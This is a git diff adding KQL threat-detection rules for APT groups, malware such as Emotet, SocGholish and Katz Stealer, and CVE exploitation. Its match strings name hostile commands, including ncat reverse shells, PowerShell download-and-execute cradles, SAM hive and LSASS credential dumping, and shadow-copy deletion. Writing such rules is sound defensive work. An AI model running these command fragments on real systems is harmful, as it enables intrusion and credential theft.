b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql @@ -0,0 +1,12 @@ +// Title: Diamond Sleet APT File Creation Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects file creation activity that is related to Diamond Sleet APT activity +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith ":\\ProgramData\\4800-84DC-063A6A41C5C" or FolderPath endswith ":\\ProgramData\\clip.exe" or FolderPath endswith ":\\ProgramData\\DSROLE.dll" or FolderPath endswith ":\\ProgramData\\Forest64.exe" or FolderPath endswith ":\\ProgramData\\readme.md" or FolderPath endswith ":\\ProgramData\\Version.dll" or FolderPath endswith ":\\ProgramData\\wsmprovhost.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql new file mode 100644 index 00000000..62380147 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql @@ -0,0 +1,12 @@ +// Title: Diamond Sleet APT Process Activity Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-24 +// Level: high +// Description: Detects process creation activity indicators related to Diamond Sleet APT +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " uTYNkfKxHiZrx3KJ" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql b/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql new file mode 100644 index 00000000..64ec2a68 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql @@ -0,0 +1,10 @@ +// Title: Droppers Exploiting CVE-2017-11882 +// Author: Florian Roth (Nextron Systems) +// Date: 2017-11-23 +// Level: critical +// Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-11882, detection.emerging-threats + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql b/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql new file mode 100644 index 00000000..e6e47dcf --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql @@ -0,0 +1,12 @@ +// Title: Elise Backdoor Activity +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-01-31 +// Level: critical +// Description: Detects Elise backdoor activity used by APT32 +// MITRE Tactic: Execution +// Tags: attack.g0030, attack.g0050, attack.s0081, attack.execution, attack.t1059.003, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\Windows\\Caches\\NavShExt.dll" and ProcessCommandLine contains "/c del") or FolderPath endswith "\\Microsoft\\Network\\svchost.exe") or (ProcessCommandLine contains ",Setting" and (ProcessCommandLine endswith "\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll" or ProcessCommandLine endswith "\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql new file mode 100644 index 00000000..7fba0278 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql @@ -0,0 +1,14 @@ +// Title: Emotet Loader Execution Via .LNK File +// Author: @kostastsale +// Date: 2022-04-22 +// Level: high +// Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. +The ".lnk" file was delivered via phishing campaign. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "findstr" and ProcessCommandLine contains ".vbs" and ProcessCommandLine contains ".lnk") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql new file mode 100644 index 00000000..f24372fd --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql @@ -0,0 +1,12 @@ +// Title: Exploit for CVE-2017-0261 +// Author: Florian Roth (Nextron Systems) +// Date: 2018-02-22 +// Level: medium +// Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-0261, detection.emerging-threats +// False Positives: +// - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders) + +DeviceProcessEvents +| where FolderPath contains "\\FLTLDR.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql new file mode 100644 index 00000000..cc1e35fb --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql @@ -0,0 +1,10 @@ +// Title: Exploit for CVE-2017-8759 +// Author: Florian Roth (Nextron Systems) +// Date: 2017-09-15 +// Level: critical +// Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-8759, detection.emerging-threats + +DeviceProcessEvents +| where FolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql new file mode 100644 index 00000000..17c7a2b9 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql @@ -0,0 +1,14 @@ +// Title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process +// Author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-31 +// Level: high +// Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe. +This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats +// False Positives: +// - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise. + +DeviceProcessEvents +| where ((InitiatingProcessCommandLine contains "WsusPool" and InitiatingProcessFolderPath endswith "\\w3wp.exe") or InitiatingProcessFolderPath endswith "\\wsusservice.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql b/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql new file mode 100644 index 00000000..eab81083 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql @@ -0,0 +1,10 @@ +// Title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-02-12 +// Level: high +// Description: Detects the execution of the commonly used ZeroLogon PoC executable. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1210, cve.2020-1472, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains "Administrator" and ProcessCommandLine contains "-c") and (FolderPath endswith "\\cool.exe" or FolderPath endswith "\\zero.exe") and InitiatingProcessFolderPath endswith "\\cmd.exe") and ((ProcessCommandLine contains "taskkill" and ProcessCommandLine contains "/f" and ProcessCommandLine contains "/im") or ProcessCommandLine contains "powershell") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql b/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql new file mode 100644 index 00000000..8207429f --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql @@ -0,0 +1,12 @@ +// Title: FakeUpdates/SocGholish Activity +// Author: @kostastsale +// Date: 2022-06-16 +// Level: high +// Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessCommandLine contains "Chrome" or InitiatingProcessCommandLine contains "Edge" or InitiatingProcessCommandLine contains "Firefox" or InitiatingProcessCommandLine contains "Opera" or InitiatingProcessCommandLine contains "Brave" or InitiatingProcessCommandLine contains "Vivaldi") and (InitiatingProcessCommandLine contains "\\AppData\\Local\\Temp" and InitiatingProcessCommandLine contains ".zip" and InitiatingProcessCommandLine contains "update" and InitiatingProcessCommandLine contains ".js") and InitiatingProcessFolderPath endswith "\\wscript.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql new file mode 100644 index 00000000..9b7d3ade --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/file_creation_related_to_rat_clients.kql @@ -0,0 +1,13 @@ +// Title: File Creation Related To RAT Clients +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-12-19 +// Level: high +// Description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild. + +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Legitimate software creating a file with the same name + +DeviceFileEvents +| where FolderPath contains "\\AppData\\Roaming\\" and ((FolderPath contains "\\mydata\\" or FolderPath contains "\\datalogs\\" or FolderPath contains "\\hvnc\\" or FolderPath contains "\\dcrat\\") and (FolderPath endswith "\\datalogs.conf" or FolderPath endswith "\\hvnc.conf" or FolderPath endswith "\\dcrat.conf")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql b/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql new file mode 100644 index 00000000..ae2317ff --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/fireball_archer_install.kql @@ -0,0 +1,10 @@ +// Title: Fireball Archer Install +// Author: Florian Roth (Nextron Systems) +// Date: 2017-06-03 +// Level: high +// Description: Detects Archer malware invocation via rundll32 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "InstallArcherSvc" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql b/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql new file mode 100644 index 00000000..7e07a4b4 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql @@ -0,0 +1,12 @@ +// Title: Goofy Guineapig Backdoor IOC +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-14 +// Level: high +// Description: Detects malicious indicators seen used by the Goofy Guineapig malware +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath in~ ("C:\\ProgramData\\GoogleUpdate\\config.dat", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate.exe", "C:\\ProgramData\\GoogleUpdate\\GoogleUpdate\\tmp.bat", "C:\\ProgramData\\GoogleUpdate\\goopdate.dll") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql b/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql new file mode 100644 index 00000000..3abe5dce --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/greenbug_espionage_group_indicators.kql @@ -0,0 +1,12 @@ +// Title: Greenbug Espionage Group Indicators +// Author: Florian Roth (Nextron Systems) +// Date: 2020-05-20 +// Level: critical +// Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec +// MITRE Tactic: Execution +// Tags: attack.g0049, attack.execution, attack.t1059.001, attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1036.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith ":\\ProgramData\\adobe\\Adobe.exe" or FolderPath endswith ":\\ProgramData\\oracle\\local.exe" or FolderPath endswith "\\revshell.exe" or FolderPath endswith "\\infopagesbackup\\ncat.exe" or FolderPath endswith ":\\ProgramData\\comms\\comms.exe") or (ProcessCommandLine contains "-ExecutionPolicy Bypass -File" and ProcessCommandLine contains "\\msf.ps1") or (ProcessCommandLine contains "infopagesbackup" and ProcessCommandLine contains "\\ncat" and ProcessCommandLine contains "-e cmd.exe") or ProcessCommandLine contains "L3NlcnZlcj1" or (ProcessCommandLine contains "system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill" or ProcessCommandLine contains "-nop -w hidden -c $k=new-object" or ProcessCommandLine contains "[Net.CredentialCache]::DefaultCredentials;IEX " or ProcessCommandLine contains " -nop -w hidden -c $m=new-object net.webclient;$m" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass whoami" or ProcessCommandLine contains "-noninteractive -executionpolicy bypass netstat -a") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql b/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql new file mode 100644 index 00000000..892bdc57 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/griffon_malware_attack_pattern.kql @@ -0,0 +1,12 @@ +// Title: Griffon Malware Attack Pattern +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-09 +// Level: critical +// Description: Detects process execution patterns related to Griffon malware as reported by Kaspersky +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "\\local\\temp\\" and ProcessCommandLine contains "//b /e:jscript" and ProcessCommandLine contains ".txt" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql b/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql new file mode 100644 index 00000000..bc79ef77 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql @@ -0,0 +1,10 @@ +// Title: Hermetic Wiper TG Process Patterns +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-25 +// Level: high +// Description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.lateral-movement, attack.t1021.001, detection.emerging-threats + +DeviceProcessEvents +| where FolderPath endswith "\\policydefinitions\\postgresql.exe" or ((ProcessCommandLine contains "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp" or ProcessCommandLine contains " 1> \\\\127.0.0.1\\ADMIN$\\__16") or (ProcessCommandLine contains "powershell -c " and ProcessCommandLine contains "\\comsvcs.dll MiniDump " and ProcessCommandLine contains "\\winupd.log full")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql b/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql new file mode 100644 index 00000000..deb455f1 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/kalambur_backdoor_curl_tor_socks_proxy_execution.kql @@ -0,0 +1,12 @@ +// Title: Kalambur Backdoor Curl TOR SOCKS Proxy Execution +// Author: Arda Buyukkaya (EclecticIQ) +// Date: 2025-02-11 +// Level: high +// Description: Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.t1090, attack.t1573, attack.t1071.001, attack.t1059.001, attack.s0183, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where FolderPath endswith "\\curl.exe" and ProcessCommandLine contains ".onion" and (ProcessCommandLine contains "socks5h://" or ProcessCommandLine contains "socks5://" or ProcessCommandLine contains "socks4a://") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql new file mode 100644 index 00000000..df9d507b --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/kapeka_backdoor_loaded_via_rundll32_exe.kql @@ -0,0 +1,12 @@ +// Title: Kapeka Backdoor Loaded Via Rundll32.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2024-07-03 +// Level: high +// Description: Detects the Kapeka Backdoor binary being loaded by rundll32.exe. +The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.011, detection.emerging-threats + +DeviceImageLoadEvents +| where (FolderPath contains ":\\ProgramData" or FolderPath contains "\\AppData\\Local\\") and FolderPath matches regex "[a-zA-Z]{5,6}\\.wll" and InitiatingProcessFolderPath endswith "\\rundll32.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql new file mode 100644 index 00000000..ae1da639 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/katz_stealer_dll_loaded.kql @@ -0,0 +1,15 @@ +// Title: Katz Stealer DLL Loaded +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-05-22 +// Level: high +// Description: Detects loading of DLLs associated with Katz Stealer malware 2025 variants. +Katz Stealer is a malware variant that is known to be used for stealing sensitive information from compromised systems. +The process that loads these DLLs are very likely to be malicious. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1129, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\katz_ontop.dll" or FolderPath endswith "\\AppData\\Local\\Temp\\received_dll.dll" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql new file mode 100644 index 00000000..1328975d --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/lace_tempest_cobalt_strike_download.kql @@ -0,0 +1,12 @@ +// Title: Lace Tempest Cobalt Strike Download +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-09 +// Level: high +// Description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring(" and ProcessCommandLine contains "/a')" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql new file mode 100644 index 00000000..5dc1fe91 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/lace_tempest_file_indicators.kql @@ -0,0 +1,12 @@ +// Title: Lace Tempest File Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-09 +// Level: high +// Description: Detects PowerShell script file creation with specific names or suffixes which was seen being used often in PowerShell scripts by FIN7 +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where (FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles.war" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\leave") or FolderPath contains ":\\Program Files\\SysAidServer\\tomcat\\webapps\\user." \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql b/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql new file mode 100644 index 00000000..6f520623 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/lace_tempest_malware_loader_execution.kql @@ -0,0 +1,12 @@ +// Title: Lace Tempest Malware Loader Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-09 +// Level: high +// Description: Detects execution of a specific binary based on filename and hash used by Lace Tempest to load additional malware as reported by SysAid Team +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where SHA256 startswith "B5ACF14CDAC40BE590318DEE95425D0746E85B1B7B1CBD14DA66F21F2522BF4D" or FolderPath endswith ":\\Program Files\\SysAidServer\\tomcat\\webapps\\usersfiles\\user.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql b/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql new file mode 100644 index 00000000..b582bc74 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/lazarus_group_activity.kql @@ -0,0 +1,12 @@ +// Title: Lazarus Group Activity +// Author: Florian Roth (Nextron Systems), wagga +// Date: 2020-12-23 +// Level: critical +// Description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity +// MITRE Tactic: Execution +// Tags: attack.g0032, attack.execution, attack.t1059, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "reg.exe save hklm\\sam %temp%\\~reg_sam.save" or ProcessCommandLine contains "1q2w3e4r@#$@#$@#$" or ProcessCommandLine contains " -hp1q2w3e4 " or ProcessCommandLine contains ".dat data03 10000 -p ") or (ProcessCommandLine contains "netstat -aon | find " and ProcessCommandLine contains "ESTA" and ProcessCommandLine contains " > %temp%\\~") or (ProcessCommandLine contains ".255 10 C:\\ProgramData\\IBM\\" and ProcessCommandLine contains ".DAT") or ((ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\RECYCLER\\") and (ProcessCommandLine contains " /c " and ProcessCommandLine contains " -p 0x")) or ((ProcessCommandLine contains ".bin," or ProcessCommandLine contains ".tmp," or ProcessCommandLine contains ".dat," or ProcessCommandLine contains ".io," or ProcessCommandLine contains ".ini," or ProcessCommandLine contains ".db,") and (ProcessCommandLine contains "rundll32 " and ProcessCommandLine contains "C:\\ProgramData\\")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql new file mode 100644 index 00000000..63704116 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/macos_filegrabber_infostealer.kql @@ -0,0 +1,10 @@ +// Title: MacOS FileGrabber Infostealer +// Author: Jason Phang Vern - Onn (Gen Digital) +// Date: 2025-09-12 +// Level: high +// Description: Detects execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "FileGrabber" and ProcessCommandLine contains "/tmp" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql b/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql new file mode 100644 index 00000000..b2f62614 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql @@ -0,0 +1,10 @@ +// Title: MERCURY APT Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2022-08-26 +// Level: high +// Description: Detects suspicious command line patterns seen being used by MERCURY APT +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.g0069, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "-exec bypass -w 1 -enc" and ProcessCommandLine contains "UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql new file mode 100644 index 00000000..f9bb6ba8 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_asperafaspex_suspicious_process_execution.kql @@ -0,0 +1,12 @@ +// Title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +// Date: 2023-04-20 +// Level: critical +// Description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (InitiatingProcessFolderPath contains "aspera" and InitiatingProcessFolderPath contains "\\ruby") and ((((ProcessCommandLine contains " echo " or ProcessCommandLine contains "-dumpmode" or ProcessCommandLine contains "-ssh" or ProcessCommandLine contains ".dmp" or ProcessCommandLine contains "add-MpPreference" or ProcessCommandLine contains "adscredentials" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "csvhost.exe" or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "dsquery" or ProcessCommandLine contains "ekern.exe" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "iex(" or ProcessCommandLine contains "Invoke-Expression" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "localgroup administrators" or ProcessCommandLine contains "o365accountconfiguration" or ProcessCommandLine contains "samaccountname=" or ProcessCommandLine contains "set-MpPreference" or ProcessCommandLine contains "svhost.exe" or ProcessCommandLine contains "System.IO.Compression" or ProcessCommandLine contains "System.IO.MemoryStream" or ProcessCommandLine contains "usoprivate" or ProcessCommandLine contains "usoshared" or ProcessCommandLine contains "whoami") or (ProcessCommandLine matches regex "[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}" or ProcessCommandLine matches regex "net\\s+user" or ProcessCommandLine matches regex "net\\s+group" or ProcessCommandLine matches regex "query\\s+session")) and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe")) or (ProcessCommandLine contains "lsass" and (ProcessCommandLine contains "procdump" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "findstr")) or ((ProcessCommandLine contains "http" and FolderPath endswith "\\curl.exe") or (ProcessCommandLine contains "localgroup Administrators" and ProcessCommandLine contains "/add") or (ProcessCommandLine contains "net" and (ProcessCommandLine contains "user" and ProcessCommandLine contains "/add")) or ((ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableAntiSpyware" and ProcessCommandLine contains "\\Microsoft\\Windows Defender") or (ProcessCommandLine contains "reg add" and ProcessCommandLine contains "DisableRestrictedAdmin" and ProcessCommandLine contains "CurrentControlSet\\Control\\Lsa")) or (ProcessCommandLine contains "E:jscript" or ProcessCommandLine contains "e:vbscript") or (ProcessCommandLine contains "vssadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadows") or (ProcessCommandLine contains "wbadmin" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog") or (ProcessCommandLine contains "http" and FolderPath endswith "\\wget.exe") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "process call create") or (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "shadowcopy"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql b/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql new file mode 100644 index 00000000..e62e4237 --- /dev/null +++ b/KQL/rules-emerging-threats/Execution/mint_sandstorm_log4j_wstomcat_process_execution.kql @@ -0,0 +1,10 @@ +// Title: Mint Sandstorm - Log4J Wstomcat Process Execution +// Author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) +// Date: 2023-04-20 +// Level: high +// Description: Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity +// MITRE Tactic: Execution +// Tags: attack.execution, detection.emerging-threats + 